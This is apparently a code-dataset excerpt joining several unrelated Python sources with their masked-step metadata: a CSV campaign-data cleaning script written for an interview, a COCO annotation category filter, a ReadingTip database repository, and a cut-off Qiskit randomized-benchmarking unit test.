row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\nfinalOutput = (\n 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode'\n + '\\n')\nerrorFinalOutput = ''\noutputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()\n ) + '.csv'\npickelFileName = 'pickle/' + str(date.today())\npickleDict = {}\nmaxLines = 99999\ndataSources = []\nindices = {'Provider Name': 0, 'CampaignID': 0, 'Cost Per Ad Click': 0,\n 'Redirect Link': 0, 'Phone Number': 0, 'Address': 0, 'Zipcode': 0}\ninputDirectory = 'inputFiles'\ncurrentLines = 0\nfor file in os.listdir(inputDirectory):\n currentLines += sum(1 for line in open(inputDirectory + '/' + file))\n if currentLines > maxLines:\n sys.exit('Error: Too many lines')\n if file[-3:] != 'csv':\n sys.exit('Error: Given file not a .csv file')\nfor file in os.listdir(inputDirectory):\n usableRows = 0\n errorRows = 0\n with open(inputDirectory + '/' + file, newline='') as f:\n reader = csv.reader(f)\n try:\n headers = next(reader)\n except:\n headers = ''\n indicesCurrent, valid = getHeaderIndexes(indices, headers)\n if valid == True:\n for row in reader:\n if isRowValid(indicesCurrent, row):\n finalOutput = addUsableRow(indicesCurrent, row, finalOutput\n )\n usableRows += 1\n else:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n pickleDict[file] = indicesCurrent\n else:\n for row in reader:\n errorFinalOutput = 
addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n f.close()\n newDataSource = DataSource(file, usableRows, errorRows, indices)\n dataSources.append(newDataSource)\nwith open(outputFileName, 'w+') as f:\n f.write(finalOutput)\nf.close()\nprint(errorFinalOutput)\nwith open(pickelFileName, 'wb') as f:\n pickle.dump(dataSources, f)\nf.close()\nwith open('pickle/masterDict', 'wb') as f:\n pickle.dump(pickleDict, f)\nf.close()\nprint(\n 'Thanks for taking the time to look at my code and consider me for this position. Cheers!'\n )\n",
"step-5": "#Created by Jake Hansen for Zebra interview take home assessment, July 2020.\nimport csv, os, sys, pickle\nfrom datetime import date\n\n#Class For storing information about each file generally. Helpful for future\n#use cases to remember the indicies from a file, if file has thousands of fields\n#Also can be used as a log to store daily number of 'good' vs 'bad' rows\nclass DataSource:\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n# getHeaderIndexes(indices, headers)\n# Requires: Pre-populated indices dictionary, the header's row from a CSV file with\n# naming convention conforming to the schema output from the directions\n# Effects: Determines if file has the necessary colums to match the desired output\n# schema\n# Modifies: The indices variable, returning the correct indices within the csv row\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a,b,c,d,e,f,g = False, False, False, False,False,False,False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if a == True and b == True and c == True and d == True and e == True and f == True and g == True:\n valid = True\n else:\n valid = False\n return indices, valid\n\n# isRowValid(indices,row)\n# Requires: a valid CSV file with columns necessary to match the expected output\n# Effects: Determines 
if a single row should be added to the final output, or if\n# the row is missing data / has incorrect data types for the field and thus\n# will not be added to the output but instead printed out\n# Modifies: N/A\ndef isRowValid(indices, row):\n #String Non-Nullables\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address', 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n\n #Float Non Nullables\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n\n #String Nullables\n sNs = ['Phone Number']\n #No Check Required, because it can be nullable or a string. I do assume that\n #it is required to have a \"Phone Number\" column, which is checked for in getHeaderIndexes\n\n return True\n\n# addUsableRow(indices, row, finalOutput)\n# Requires: The row is known to follow the output schema as specificed in the requirements\n# Effects: Adds row variables in the order specified in the output schema\n# Modifies: the final output variable\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n\n temp = '\"'+ pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' + phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n'\n finalOutput += temp\n return finalOutput\n\n# addErrorRow(indices, row, errorFinalOutput)\n# Requires: The row does not follow the output schema\n# Effects: adds the row to the 
error output variable that will be printed out\n# Modifies: the error final output string which gets printed at the end of the daily\n# job / procedure / script/ whatever The Zebra prefers to call these python data projects\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n#Variables and data structures\nfinalOutput = 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode' + '\\n'\nerrorFinalOutput = ''\n# outputFileName = 'outputFilesTest/ZebraAssignmentOutput-' + str(date.today()) + '.csv'\noutputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()) + '.csv'\npickelFileName = 'pickle/' + str(date.today())\n# pickelFileName = 'pickleTest/' + str(date.today())\npickleDict = {}\nmaxLines = 99999\ndataSources = []\nindices = {\n \"Provider Name\": 0,\n \"CampaignID\": 0,\n \"Cost Per Ad Click\": 0,\n \"Redirect Link\": 0,\n \"Phone Number\": 0,\n \"Address\": 0,\n \"Zipcode\": 0\n}\n\n#InputFiles in list form\n# inputList = [\n# 'inputFilesTest/Auto.csv',\n# 'inputFilesTest/Home.csv'\n# ]\n\n# InputFiles in a directory\ninputDirectory = 'inputFiles'\n\n#check if files are too large, or non-csv files\ncurrentLines = 0\nfor file in os.listdir(inputDirectory):\n# for file in inputList:\n # currentLines += sum(1 for line in open(file))\n currentLines += sum(1 for line in open(inputDirectory + '/' + file))\n if currentLines > maxLines:\n sys.exit('Error: Too many lines')\n if file[-3:] != 'csv':\n sys.exit('Error: Given file not a .csv file')\n\n#Main Algorithm loop through all files in the list\nfor file in os.listdir(inputDirectory):\n# for file in inputList:\n #usableRows and errorRows used for storing information from each data source\n usableRows = 0\n errorRows = 0\n # with open(file, newline='') as f:\n with open(inputDirectory + '/' + file, newline='') as 
f:\n reader = csv.reader(f)\n try:\n headers = next(reader)\n except:\n headers = ''\n indicesCurrent, valid = getHeaderIndexes(indices, headers)\n if valid == True:\n for row in reader:\n if isRowValid(indicesCurrent, row):\n finalOutput = addUsableRow(indicesCurrent,row, finalOutput)\n usableRows += 1\n else:\n errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)\n errorRows += 1\n pickleDict[file] = indicesCurrent\n\n else:\n for row in reader:\n errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)\n errorRows += 1\n\n f.close()\n #Add dataSource Information for possible future needs and logging purposes\n newDataSource = DataSource(file,usableRows, errorRows, indices)\n dataSources.append(newDataSource)\n\n#Create file with rows containing correct schema\nwith open(outputFileName, 'w+') as f:\n f.write(finalOutput)\nf.close()\n\n#print the incorrect rows\nprint(errorFinalOutput)\n\n#Create Pickel file containing data source info for daily logging\nwith open(pickelFileName, 'wb') as f:\n pickle.dump(dataSources, f)\nf.close()\n\n#Create Pickle File dictionary with indices specific info for filenames\nwith open('pickle/masterDict', 'wb') as f:\n pickle.dump(pickleDict, f)\nf.close()\n\n#Thank you line\nprint(\"Thanks for taking the time to look at my code and consider me for this position. Cheers!\")\n",
"step-ids": [
5,
6,
8,
9,
10
]
}
|
[
5,
6,
8,
9,
10
] |
import json
import sys
from copy import deepcopy
from argparse import ArgumentParser
# TODO: Ord category's IDs after deletion
def return_cat_name(json_coco, category):
    """Look up the name of a COCO category by its numeric ID.

    Arguments:
        json_coco {dict} -- parsed COCO annotation file
        category {int} -- category ID to resolve

    Returns:
        string -- the matching category name

    Exits the program via sys.exit() when the ID is not present.
    """
    matches = (entry['name'] for entry in json_coco['categories']
               if entry['id'] == category)
    name = next(matches, None)
    if name is not None:
        return name
    print("Categoria não encontrada: ", category)
    sys.exit()
def main():
    """Remove a fixed list of categories (and their annotations) from a COCO json file.

    Reads the input path and output path from the command line, drops every
    annotation whose category name is in ``category_names`` as well as the
    category entries themselves, and writes the filtered json to the output.
    """
    parser = ArgumentParser(
        description='Category Filter: Filter a List of Categories from a JSON')
    parser.add_argument('json_file_path', help='JSON file path')
    parser.add_argument('out_file', help='Output filename')
    args = parser.parse_args()

    # Category names to strip from the dataset (set: O(1) membership tests).
    category_names = {"sports ball", "cell phone", "couch", "elephant", "tie", "spoon", "skis", "apple", "giraffe", "laptop", "tennis racket", "sink", "dog", "fork", "cat", "teddy bear", "train", "skateboard", "toilet", "sandwich", "bed", "keyboard", "baseball glove", "baseball bat", "airplane", "oven", "hot dog", "refrigerator", "frisbee", "mouse", "fire hydrant", "stop sign", "bear", "snowboard", "parking meter", "toothbrush", "microwave", "scissors", "hair drier", "toaster"}

    # Context manager closes the annotation file (it was previously leaked).
    with open(args.json_file_path) as ann_file:
        json_coco = json.load(ann_file)

    new_json = deepcopy(json_coco)

    # Rebuild each list in one pass instead of calling list.remove() per hit,
    # which rescanned the whole list every time (O(n^2) overall).
    new_json['annotations'] = [
        ann for ann in new_json['annotations']
        if return_cat_name(json_coco, ann['category_id']) not in category_names
    ]
    new_json['categories'] = [
        cat for cat in new_json['categories'] if cat['name'] not in category_names
    ]

    with open(args.out_file, "w") as output:
        json.dump(new_json, output)
# Script entry point: run the filter only when executed directly, not on import.
if __name__ == "__main__":
    main()
|
normal
|
{
"blob_id": "467327b98ab99bdad429943c701c751be4f67940",
"index": 9378,
"step-1": "<mask token>\n\n\ndef main():\n \"\"\"Remove a category from a coco json file\n \"\"\"\n parser = ArgumentParser(description=\n 'Category Filter: Filter a List of Categories from a JSON')\n parser.add_argument('json_file_path', help='JSON file path')\n parser.add_argument('out_file', help='Output filename')\n args = parser.parse_args()\n ann_file = open(args.json_file_path)\n category_names = ['sports ball', 'cell phone', 'couch', 'elephant',\n 'tie', 'spoon', 'skis', 'apple', 'giraffe', 'laptop',\n 'tennis racket', 'sink', 'dog', 'fork', 'cat', 'teddy bear',\n 'train', 'skateboard', 'toilet', 'sandwich', 'bed', 'keyboard',\n 'baseball glove', 'baseball bat', 'airplane', 'oven', 'hot dog',\n 'refrigerator', 'frisbee', 'mouse', 'fire hydrant', 'stop sign',\n 'bear', 'snowboard', 'parking meter', 'toothbrush', 'microwave',\n 'scissors', 'hair drier', 'toaster']\n json_coco = json.load(ann_file)\n new_json = deepcopy(json_coco)\n for ann in json_coco['annotations']:\n if return_cat_name(json_coco, ann['category_id']) in category_names:\n new_json['annotations'].remove(ann)\n for cat in json_coco['categories']:\n if cat['name'] in category_names:\n new_json['categories'].remove(cat)\n output = open(args.out_file, 'w')\n json.dump(new_json, output)\n output.close()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef return_cat_name(json_coco, category):\n \"\"\"Return the category name of a category ID\n\n Arguments:\n json_coco {dict} -- json dict file from coco file\n category {int} -- category ID\n\n Returns:\n string -- category name\n Raises:\n KeyError: Category ID not found\n \"\"\"\n for cat in json_coco['categories']:\n if cat['id'] == category:\n return cat['name']\n print('Categoria não encontrada: ', category)\n sys.exit()\n\n\ndef main():\n \"\"\"Remove a category from a coco json file\n \"\"\"\n parser = ArgumentParser(description=\n 'Category Filter: Filter a List of Categories from a JSON')\n parser.add_argument('json_file_path', help='JSON file path')\n parser.add_argument('out_file', help='Output filename')\n args = parser.parse_args()\n ann_file = open(args.json_file_path)\n category_names = ['sports ball', 'cell phone', 'couch', 'elephant',\n 'tie', 'spoon', 'skis', 'apple', 'giraffe', 'laptop',\n 'tennis racket', 'sink', 'dog', 'fork', 'cat', 'teddy bear',\n 'train', 'skateboard', 'toilet', 'sandwich', 'bed', 'keyboard',\n 'baseball glove', 'baseball bat', 'airplane', 'oven', 'hot dog',\n 'refrigerator', 'frisbee', 'mouse', 'fire hydrant', 'stop sign',\n 'bear', 'snowboard', 'parking meter', 'toothbrush', 'microwave',\n 'scissors', 'hair drier', 'toaster']\n json_coco = json.load(ann_file)\n new_json = deepcopy(json_coco)\n for ann in json_coco['annotations']:\n if return_cat_name(json_coco, ann['category_id']) in category_names:\n new_json['annotations'].remove(ann)\n for cat in json_coco['categories']:\n if cat['name'] in category_names:\n new_json['categories'].remove(cat)\n output = open(args.out_file, 'w')\n json.dump(new_json, output)\n output.close()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef return_cat_name(json_coco, category):\n \"\"\"Return the category name of a category ID\n\n Arguments:\n json_coco {dict} -- json dict file from coco file\n category {int} -- category ID\n\n Returns:\n string -- category name\n Raises:\n KeyError: Category ID not found\n \"\"\"\n for cat in json_coco['categories']:\n if cat['id'] == category:\n return cat['name']\n print('Categoria não encontrada: ', category)\n sys.exit()\n\n\ndef main():\n \"\"\"Remove a category from a coco json file\n \"\"\"\n parser = ArgumentParser(description=\n 'Category Filter: Filter a List of Categories from a JSON')\n parser.add_argument('json_file_path', help='JSON file path')\n parser.add_argument('out_file', help='Output filename')\n args = parser.parse_args()\n ann_file = open(args.json_file_path)\n category_names = ['sports ball', 'cell phone', 'couch', 'elephant',\n 'tie', 'spoon', 'skis', 'apple', 'giraffe', 'laptop',\n 'tennis racket', 'sink', 'dog', 'fork', 'cat', 'teddy bear',\n 'train', 'skateboard', 'toilet', 'sandwich', 'bed', 'keyboard',\n 'baseball glove', 'baseball bat', 'airplane', 'oven', 'hot dog',\n 'refrigerator', 'frisbee', 'mouse', 'fire hydrant', 'stop sign',\n 'bear', 'snowboard', 'parking meter', 'toothbrush', 'microwave',\n 'scissors', 'hair drier', 'toaster']\n json_coco = json.load(ann_file)\n new_json = deepcopy(json_coco)\n for ann in json_coco['annotations']:\n if return_cat_name(json_coco, ann['category_id']) in category_names:\n new_json['annotations'].remove(ann)\n for cat in json_coco['categories']:\n if cat['name'] in category_names:\n new_json['categories'].remove(cat)\n output = open(args.out_file, 'w')\n json.dump(new_json, output)\n output.close()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import json\nimport sys\nfrom copy import deepcopy\nfrom argparse import ArgumentParser\n\n\ndef return_cat_name(json_coco, category):\n \"\"\"Return the category name of a category ID\n\n Arguments:\n json_coco {dict} -- json dict file from coco file\n category {int} -- category ID\n\n Returns:\n string -- category name\n Raises:\n KeyError: Category ID not found\n \"\"\"\n for cat in json_coco['categories']:\n if cat['id'] == category:\n return cat['name']\n print('Categoria não encontrada: ', category)\n sys.exit()\n\n\ndef main():\n \"\"\"Remove a category from a coco json file\n \"\"\"\n parser = ArgumentParser(description=\n 'Category Filter: Filter a List of Categories from a JSON')\n parser.add_argument('json_file_path', help='JSON file path')\n parser.add_argument('out_file', help='Output filename')\n args = parser.parse_args()\n ann_file = open(args.json_file_path)\n category_names = ['sports ball', 'cell phone', 'couch', 'elephant',\n 'tie', 'spoon', 'skis', 'apple', 'giraffe', 'laptop',\n 'tennis racket', 'sink', 'dog', 'fork', 'cat', 'teddy bear',\n 'train', 'skateboard', 'toilet', 'sandwich', 'bed', 'keyboard',\n 'baseball glove', 'baseball bat', 'airplane', 'oven', 'hot dog',\n 'refrigerator', 'frisbee', 'mouse', 'fire hydrant', 'stop sign',\n 'bear', 'snowboard', 'parking meter', 'toothbrush', 'microwave',\n 'scissors', 'hair drier', 'toaster']\n json_coco = json.load(ann_file)\n new_json = deepcopy(json_coco)\n for ann in json_coco['annotations']:\n if return_cat_name(json_coco, ann['category_id']) in category_names:\n new_json['annotations'].remove(ann)\n for cat in json_coco['categories']:\n if cat['name'] in category_names:\n new_json['categories'].remove(cat)\n output = open(args.out_file, 'w')\n json.dump(new_json, output)\n output.close()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import json\nimport sys\nfrom copy import deepcopy\nfrom argparse import ArgumentParser\n\n# TODO: Ord category's IDs after deletion\n\n\ndef return_cat_name(json_coco, category):\n \"\"\"Return the category name of a category ID\n\n Arguments:\n json_coco {dict} -- json dict file from coco file\n category {int} -- category ID\n\n Returns:\n string -- category name\n Raises:\n KeyError: Category ID not found\n \"\"\"\n for cat in json_coco['categories']:\n if cat['id'] == category:\n return cat['name']\n print(\"Categoria não encontrada: \", category)\n sys.exit()\n\n\ndef main():\n \"\"\"Remove a category from a coco json file\n \"\"\"\n parser = ArgumentParser(\n description='Category Filter: Filter a List of Categories from a JSON')\n parser.add_argument('json_file_path', help='JSON file path')\n parser.add_argument('out_file', help='Output filename')\n args = parser.parse_args()\n\n ann_file = open(args.json_file_path)\n category_names = [\"sports ball\", \"cell phone\", \"couch\", \"elephant\", \"tie\", \"spoon\", \"skis\", \"apple\", \"giraffe\", \"laptop\", \"tennis racket\", \"sink\", \"dog\", \"fork\", \"cat\", \"teddy bear\", \"train\", \"skateboard\", \"toilet\", \"sandwich\", \"bed\", \"keyboard\", \"baseball glove\", \"baseball bat\", \"airplane\", \"oven\", \"hot dog\", \"refrigerator\", \"frisbee\", \"mouse\", \"fire hydrant\", \"stop sign\", \"bear\", \"snowboard\", \"parking meter\", \"toothbrush\", \"microwave\", \"scissors\", \"hair drier\", \"toaster\"]\n\n json_coco = json.load(ann_file)\n new_json = deepcopy(json_coco)\n\n for ann in json_coco['annotations']:\n if return_cat_name(json_coco, ann['category_id']) in category_names:\n new_json['annotations'].remove(ann)\n\n for cat in json_coco['categories']:\n if cat['name'] in category_names:\n new_json['categories'].remove(cat)\n\n output = open(args.out_file, \"w\")\n json.dump(new_json, output)\n output.close()\n\n\nif __name__ == \"__main__\":\n main()\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from models.readingtip import ReadingTip
from database import db
class ReadingTipRepository:
    """Persistence layer for ReadingTip objects.

    Wraps the shared SQLAlchemy session so the rest of the application
    never has to touch db.session directly.
    """

    def __init__(self):
        pass

    def get_tips(self, user, tag="all"):
        """Return all tips owned by *user*.

        With the default tag "all" every tip is returned; otherwise only
        tips carrying a tag whose name equals *tag*.
        """
        if tag == "all":
            return ReadingTip.query.filter_by(user=user).all()
        return ReadingTip.query.filter_by(user=user).filter(
            ReadingTip.tags.any(name=tag)).all()

    def update_tip(self, tip_id, title, link, tags):
        """Replace the title, link and tag list of the tip with id *tip_id*."""
        tip = self.get_tip(tip_id)
        tip.title = title
        tip.link = link
        tip.tags = tags
        db.session.commit()

    def create_tip(self, tip):
        """Persist a new *tip* and return it."""
        db.session.add(tip)
        db.session.commit()
        return tip

    def get_tip(self, tip_id):
        """Fetch a single tip by primary key (None if it does not exist)."""
        return ReadingTip.query.get(tip_id)

    def delete_tip(self, tip):
        """Remove *tip* from the database."""
        db.session.delete(tip)
        db.session.commit()

    def contains_title(self, user, title):
        """Return True if *user* already has a tip with exactly this *title*."""
        amount = ReadingTip.query.filter_by(user=user, title=title).count()
        return amount > 0

    def read_tip(self, tip, date):
        """Mark *tip* as read on *date*."""
        ReadingTip.query.filter_by(id=tip.id).update({"read": date})
        db.session.commit()


# Module-level singleton shared by the service layer.
readingtip_repository = ReadingTipRepository()
|
normal
|
{
"blob_id": "d82b68d5c83ae538d7a8b5ae5547b43ac4e8a3d4",
"index": 6910,
"step-1": "<mask token>\n\n\nclass ReadingTipRepository:\n <mask token>\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n <mask token>\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n <mask token>\n <mask token>\n <mask token>\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ReadingTipRepository:\n <mask token>\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n <mask token>\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ReadingTipRepository:\n\n def __init__(self):\n pass\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n\n def get_tip(self, tip_id):\n return ReadingTip.query.get(tip_id)\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\n<mask token>\n",
"step-4": "from models.readingtip import ReadingTip\nfrom database import db\n\n\nclass ReadingTipRepository:\n\n def __init__(self):\n pass\n\n def get_tips(self, user, tag='all'):\n if tag == 'all':\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.\n tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n\n def get_tip(self, tip_id):\n return ReadingTip.query.get(tip_id)\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({'read': date})\n db.session.commit()\n\n\nreadingtip_repository = ReadingTipRepository()\n",
"step-5": "from models.readingtip import ReadingTip\nfrom database import db\n\nclass ReadingTipRepository:\n def __init__(self):\n pass\n\n def get_tips(self, user, tag=\"all\"):\n if tag == \"all\":\n return ReadingTip.query.filter_by(user=user).all()\n else:\n return ReadingTip.query.filter_by(user=user).filter(ReadingTip.tags.any(name=tag)).all()\n\n def update_tip(self, tip_id, title, link, tags):\n tip = self.get_tip(tip_id)\n print(tags)\n tip.title = title\n tip.link = link\n tip.tags = tags\n db.session.commit()\n\n def create_tip(self, tip):\n db.session.add(tip)\n db.session.commit()\n return tip\n\n def get_tip(self, tip_id):\n return ReadingTip.query.get(tip_id)\n\n def delete_tip(self, tip):\n db.session.delete(tip)\n db.session.commit()\n\n def contains_title(self, user, title):\n amount = ReadingTip.query.filter_by(user=user, title=title).count()\n return amount > 0\n\n def read_tip(self, tip, date):\n ReadingTip.query.filter_by(id=tip.id).update({\"read\":date})\n db.session.commit()\n\nreadingtip_repository = ReadingTipRepository()\n",
"step-ids": [
4,
7,
9,
11,
12
]
}
|
[
4,
7,
9,
11,
12
] |
# -*- coding: utf-8 -*-
# Copyright 2019, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
# pylint: disable=undefined-loop-variable
"""
Run through RB for different qubit numbers to check that it's working
and that it returns the identity
"""
import unittest
import random
import qiskit
import qiskit.ignis.verification.randomized_benchmarking as rb
class TestRB(unittest.TestCase):
    """Randomized-benchmarking (RB) sequence tests.

    Verifies that generated RB sequences respect the requested qubit
    pattern and length multiplier, and that under ideal simulation each
    sequence maps the ground state back to the ground state.
    """

    @staticmethod
    def choose_pattern(pattern_type, nq):
        """
        Choose a valid field for rb_opts['rb_pattern']

        :param pattern_type: a number between 0 and 2.
                             0 - a list of all qubits, for nq=5 it is
                                 [1, 2, 3, 4, 5]
                             1 - a list of lists of single qubits, for nq=5
                                 it is [[1], [2], [3], [4], [5]]
                             2 - randomly choose a pattern which is a list of
                                 two lists, for example for nq=5 it can be
                                 [[4, 1, 2], [5, 3]]
        :param nq: number of qubits
        :return: the pattern or None

        Returns None if the pattern type is not relevant to the
        number of qubits, i.e., one of two cases:
        pattern_type = 1 and nq = 1, which implies [[1]]
        pattern_type = 2 and nq <= 2: - for nq=1 this is impossible
                                      - for nq=2 this implies
                                        [[1], [2]], which is already
                                        tested when pattern_type = 1
        """
        if pattern_type == 0:
            res = [list(range(nq))]
        elif pattern_type == 1:
            if nq == 1:
                return None
            res = [[x] for x in range(nq)]
        else:
            if nq <= 2:
                return None
            shuffled_bits = list(range(nq))
            random.shuffle(shuffled_bits)
            # split into two non-empty groups at a random boundary
            split_loc = random.randint(1, nq - 1)
            res = [shuffled_bits[:split_loc], shuffled_bits[split_loc:]]
        return res

    @staticmethod
    def choose_multiplier(mult_opt, len_pattern):
        """
        Choose a valid field for rb_opts['length_multiplier']

        :param mult_opt: 0: fixed length, 1: vector of lengths
        :param len_pattern: number of patterns
        :return: the length multiplier (scalar 1, or [1, 2, ..., len_pattern])
        """
        if mult_opt == 0:
            res = 1
        else:
            res = [i + 1 for i in range(len_pattern)]
        return res

    def verify_circuit(self, circ, nq, rb_opts, vec_len, result, shots):
        """
        For a single sequence, verifies that it meets the requirements:
        - Executing it on the ground state ends up in the ground state
        - It has the correct number of Cliffords
        - It fulfills the pattern, as specified by rb_patterns and
          length_multiplier

        :param circ: the sequence to check
        :param nq: number of qubits
        :param rb_opts: the specification that generated the set of sequences
                        which includes circ
        :param vec_len: the expected length vector of circ (one of
                        rb_opts['length_vector'])
        :param result: the output of the simulator
                       when executing all the sequences on the ground state
        :param shots: the number of shots in the simulator execution
        """
        # Normalize a scalar multiplier to a per-pattern list so the loop
        # below can index it uniformly.
        if not hasattr(rb_opts['length_multiplier'], "__len__"):
            rb_opts['length_multiplier'] = [
                rb_opts['length_multiplier'] for i in range(
                    len(rb_opts['rb_pattern']))]

        ops = circ.data
        op_index = 0
        # for each cycle (the sequence should consist of vec_len cycles)
        for _ in range(vec_len):
            # for each component of the pattern...
            for pat_index in range(len(rb_opts['rb_pattern'])):
                # for each Clifford...
                for _ in range(rb_opts['length_multiplier'][pat_index]):
                    # for each basis gate...
                    while ops[op_index].name != 'barrier':
                        # Verify that the gate acts on the correct qubits
                        # This happens if the sequence is composed of the
                        # correct sub-sequences, as specified by vec_len and
                        # rb_opts
                        self.assertTrue(
                            all(x[1] in rb_opts['rb_pattern'][pat_index]
                                for x in ops[op_index].qargs),
                            "Error: operation acts on incorrect qubits")
                        op_index += 1
                    # increment because of the barrier gate
                    op_index += 1

        # check if the ground state returns
        self.assertEqual(result.
                         get_counts(circ)['{0:b}'.format(0).zfill(nq)], shots,
                         "Error: %d qubit RB does not return the \
                         ground state back to the ground state" % nq)

    def test_rb(self):
        """ Main function of the test """

        # Load simulator
        backend = qiskit.Aer.get_backend('qasm_simulator')

        # Test up to 2 qubits
        nq_list = [1, 2]

        for nq in nq_list:

            print("Testing %d qubit RB" % nq)

            for pattern_type in range(2):
                for multiplier_type in range(2):
                    # See documentation of choose_pattern for the meaning of
                    # the different pattern types
                    rb_opts = {}
                    rb_opts['nseeds'] = 3
                    rb_opts['length_vector'] = [1, 3, 4, 7]
                    rb_opts['rb_pattern'] = self.choose_pattern(
                        pattern_type, nq)
                    # if the pattern type is not relevant for nq
                    if rb_opts['rb_pattern'] is None:
                        continue
                    rb_opts['length_multiplier'] = self.choose_multiplier(
                        multiplier_type, len(rb_opts['rb_pattern']))

                    # Generate the sequences
                    try:
                        rb_circs, _ = rb.randomized_benchmarking_seq(**rb_opts)
                    except OSError:
                        skip_msg = ('Skipping tests for %s qubits because '
                                    'tables are missing' % str(nq))
